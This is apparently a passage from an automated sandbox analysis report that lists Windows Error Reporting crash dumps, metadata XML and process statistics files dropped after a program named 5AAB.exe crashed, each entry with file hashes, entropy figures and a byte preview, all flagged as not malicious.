Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.8.8.4.6.8.2.2.9.2.2.6.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.7.8.8.4.6.8.3.3.7.6.0.1.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.b.6.5.3.3.8.-.9.3.5.6.-.4.6.2.d.-.9.5.2.1.-.2.e.e.a.a.3.e.2.2.2.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.e.a.3.e.3.3.-.5.5.2.b.-.4.f.d.7.-.b.a.7.4.-.4.d.f.8.f.b.b.d.2.5.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.A.A.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.c.c.-.0.0.0.1.-.0.0.1.4.-.f.f.2.1.-.3.2.d.1.4.d.3.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.9.3.d.6.7.e.9.2.2.2.c.c.7.d.b.4.7.8.e.a.b.7.e.a.4.c.3.3.b.4.7.0.0.0.0.6.c.0.1.!.0.0.0.0.c.6.6.e.4.b.3.4.8.c.7.9.d.9.6.1.9.1.0.1.b.9.e.9.e.f.c.2.1.8.4.3.4.3.c.9.5.5.b.4.!.5.A.A.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER226F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Dec 24 09:44:28 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	71532
Entropy (8bit):	2.406573681471456
Encrypted:	false
SSDEEP:	384:AJDFNYPqh3o3HP/JtcsguT9setYV4Lb4r8jxp7t9gzzu:ABFNYPs3o3ss4etYKLb4r8lp7Yzu
MD5:	7829DC0CC1A9E076933CC175C16ABC61
SHA1:	0F4DEC664ADF76672B14008820724E56010C264B
SHA-256:	DA6C014BEECF2D2AD231E103EAD555D7E1DFB1A71CEF580CF40485E1CAA33291
SHA-512:	894A9E4EDE553F2EE10FA8E4EA075A5E55F52B9DC6EEE4E2052EE5B07138C24B1928813BE5B1608E529E4E9553A0B1104E688666F36CBD135E109F55AD27CCEC
Malicious:	false
Preview:	MDMP..a..... .......\|..e.........................................1..........T.......8...........T.......................................................................................................................eJ......<.......GenuineIntel............T...........x..e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER27BF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8330
Entropy (8bit):	3.7003314906858438
Encrypted:	false
SSDEEP:	192:R6l7wVeJHI6R6YEImSUkYegmfKpMpBX89bfssf01m:R6lXJo6R6YEJSUkBgmfKrf/fL
MD5:	5FFBBF13F79278095249EA98118BCA87
SHA1:	22884705A43476BB5E402201D75A0C686591DA5E
SHA-256:	EE4C465DB97C0F92422A95CF40AD57E6F3C1343AC24F7EC6E02909509B44EC9C
SHA-512:	C6EC7B59101904E60BDD6A8B33751A49D73D86AE030484BB7229B27A76275526674FEAC059715C16C15BC13EE6366BE91897E98DB1FBE0930407B65DDAACB47F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER282D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4589
Entropy (8bit):	4.473473257801241
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9kXWpW8VYIYm8M4JKaCFqc+q85kzRS3ydd:uIjfWI7Km7VkJKmcWeRS3ydd
MD5:	64B4FE74423250B65060DEBFBE7B75E9
SHA1:	1823DAE29CA173735A142CE6F1450DE0EF90F488
SHA-256:	E7B1B0EED3569B5CDB1763252C897AA05A1490469E5B9DBBA1D73711A0EF57F0
SHA-512:	570F58F956661ADE9C0449E70082419C69975DEB45A7CE89D8C8AE44E361E34B34659C64B79C5B61311B569B4625DF7FA089D3507BBF1C67B35737AACAC7973E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="118127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER284B.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78424
Entropy (8bit):	3.038952704300293
Encrypted:	false
SSDEEP:	768:Co9TrUEdTuDAXBcHumxgIde7MGDVw77Z7bTqTVbkQjabn:r9XUcyDSBPmxgoeIkVw77ZGTVgQGbn
MD5:	D2789169B9A302EC9B3594A60F9EAC35
SHA1:	7511C280DE3FB011935776CCE2E1B5A338AE746B
SHA-256:	7536A5C0CB986D0129B5C1C0918C423C7D65A711B28C95157E5D3399BDE18D28
SHA-512:	E90A2A95E92159189D1D3B34A2853344F10250D75A3A36D8E3CA774764F9318D26FC6E905E0A360A21FAB2C245D59B0C9D95505DDB4F62E2CCD4044A35D629E5
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2955.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.683498026445044
Encrypted:	false
SSDEEP:	96:TiZYW88TV3eY0YpWTHZYEZOFtFin3bcKTwGJqQaHiRMz1MmIb0Y3:2ZD5ODWWflaHiRMz1MhwY3
MD5:	D076257CA12E4A92E646FA9E02E4ED17
SHA1:	6E60F39B4B86B67F96D28A4B517C2D259540396F
SHA-256:	4294048AD25BE3BEDD3AB0CCFED93DC3B3E6847F9D764F47D4D197385257DCD7
SHA-512:	63CD2F6F1AE84DFE6A47745592C368C95433FDC828015D7974BB094B4FAA3D8E32116B710E474B08BA29350913B3388A57E22D49C33F82738A24EBB7D863142E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E46.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Dec 24 09:44:30 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	71404
Entropy (8bit):	2.4248246586893982
Encrypted:	false
SSDEEP:	384:+DBiWYPFU3Hu7ijs7sguT9metYV4tb4r8jxo7thTbbW:MBiWYPFU+Cs7sKetYKtb4r8lo7T
MD5:	590E56BBF26396CD0AD09B41E9436F69
SHA1:	0CEB75EBF676D6E612CDF5E50301EB161C173BD0
SHA-256:	6FE17A41EF2BA8EBC890ECA06F4310B4FE941374AE0D64F1AB6C49B123072458
SHA-512:	8CFA4362254FC4A73667A0341340C57D3AE105B169B1760CA1F5A15D5D364B579ED3660EB7C6BF6DD2A7A559C80080C0C78DC087910B4A3C1F3F20F800F5637E
Malicious:	false
Preview:	MDMP..a..... .......~..e.........................................1..........T.......8...........T.......................................................................................................................eJ......<.......GenuineIntel............T...........x..e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30E7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.7014175212041254
Encrypted:	false
SSDEEP:	192:R6l7wVeJHt6l6YEIjSUSMgmfKpMpBz89bvssfilm:R6lXJN6l6YEMSUSMgmfKvv/fJ
MD5:	21D107EE053014CEE2A17A756D1ECD19
SHA1:	D7DD052C90636A5470CC1C29AEABA525CFCB90BC
SHA-256:	718BB3ACFF69AE3566C136E05C9B482D5395BC301EE8BD102ED8546B65AFE894
SHA-512:	88B7985B540DE63946C4FBC499EC4C499D94882473883646775FFBA0D4F3CBC52AAFAF86557A2BED83A1BAF15F6785F8AAD619CFCEE21E71C422D619AD72E267
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3126.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4589
Entropy (8bit):	4.4715701977382745
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9kXWpW8VYZYm8M4JKaCFYO+q85kzRS3ydd:uIjfWI7Km7VBJKxWeRS3ydd
MD5:	579FF43078624422B073E4F5E7127DFA
SHA1:	EFD824AFF6F04F1C8757F6E7E7E178630836F58D
SHA-256:	EDBF94CE599923E0D081CFCE2A64BF3DF082C61AEFEF257285D6A84200DAF1E7
SHA-512:	801DA214A8BCCA67FC0B697C0C29124AC739C748A0973BABC76FE96449716ACAE10214E1180E51731999F8985DBCF3819ACE978A091085A171E9F28DFF67C69A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="118127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3165.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78872
Entropy (8bit):	3.0388170123285794
Encrypted:	false
SSDEEP:	768:/HrTsL+XT0Di0BEHumxgI2a7MGjVw7s7ETxTVbkQjabpebNz:/nsLw4D3BHmxgjaIEVw7sITVgQGbpeV
MD5:	3453173BD958D106FAED5B2B2027181B
SHA1:	E254155400D55D20213A9875F87A49AFCA403AE4
SHA-256:	7057B70A18B29E510B97B529B0FC3B18C05F08792F1C03C9C61482CB8A848691
SHA-512:	11B74249F9A51029181073E1AE1EF5F39CC8166DA86F080C391FEA3C4B5016A495B363D005C99E0DBEE0B6F185B1F78A94DFCD353E3A20A5255AD7AE69DC409E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3260.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6833662238152223
Encrypted:	false
SSDEEP:	96:TiZYW/VrUI5tDYJYRW1HdYEZ8Q7GtFiv32cnTwouB4basieMPM8IZY3:2ZDp1RO6QhxvasieMPM7ZY3
MD5:	988FCCB790D77CC95DD160EAA8EB5505
SHA1:	2F9E96C55C44EEFC5E30E5BC62A5D61189109914
SHA-256:	099028D621492650155572E591341BE4868C3BF11097EC213417AFE658229843
SHA-512:	F80499B149BDB4305355E4988DAB9757D424C8056B2C67F8AF8FCE2A89DF7F52BA5DB3B310FE3F616CDB2D77860F536953FF364183A8C3E4E6DB237CE6DCE2E9
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3599.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Dec 24 09:44:32 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	78980
Entropy (8bit):	2.3804018492324706
Encrypted:	false
SSDEEP:	384:26Dh1pYPAfez57dbup0Suz+4Mp+tcV4tb4r8jxp7tOfqplfJuc0:2Eh1pYPweVJbxvq+tcKtb4r8lp7xu
MD5:	7D148689633287F3BFD79FAFA7ED05A3
SHA1:	2219AEF168E31D0133F2346EC27804A7DACC11D6
SHA-256:	A218AC560795DBE07BB2A3E2462BACDC0EA070BE3EE3FCB502D20032086923F6
SHA-512:	BEB55D77990C2E1D379DE259BD4FA5B08247D3C24BFE5F723DC05635C2AB0DC5038E217CF65769B571941947DE6D7C5D011E222B48A188EB07A9F31126B96E37
Malicious:	false
Preview:	MDMP..a..... ..........e............$...............,............4..........T.......8...........T...............t.......................................................................................................eJ......l.......GenuineIntel............T...........x..e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3740.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.7010111971851183
Encrypted:	false
SSDEEP:	192:R6l7wVeJHX63W6YEIASUB4gmfKpMpBu89b0ssf98m:R6lXJ36G6YE/SUB4gmfKc0/fT
MD5:	F652C8F81EF48FBDF6D74C3C8096196E
SHA1:	FD259D5E527DFEA733DC93926A949629F41EF1E0
SHA-256:	9C5ACC3ECCA7EE01421673BBC5D41979EB319CC180365C494A7C027F05FF6330
SHA-512:	13FE0645986C0F5F1E928ED94C8A50DDF6B01F5A9C4ED73081A3018BC2D71B5C2220FE52E72A4E762F9A23168B7C3E47C53C39844BFE92D465AA46827231CE12
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER378F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4589
Entropy (8bit):	4.470136252333175
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9kXWpW8VYh0Ym8M4JKaCF3dcI+q85kzRS3ydd:uIjfWI7Km7VEBJKbdRWeRS3ydd
MD5:	6B529ABAB1E10FDC29B5A199133456F8
SHA1:	A2A82055C3B203A032CC4AA46FB6717D47B1015F
SHA-256:	77631F59C4845DADFE82EC09C8499D61264D074E0AA306650C624D859A5EB004
SHA-512:	2CA7EADF9285CF4DB4D23C9BC680A61D27FE1BB0E81444049D8872B5AF84C399614F2DBD1ABDBB3A9E6EE930B3B4F278BE2206E07C85C801AB241CEBDBCE92BC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="118127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37A0.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77660
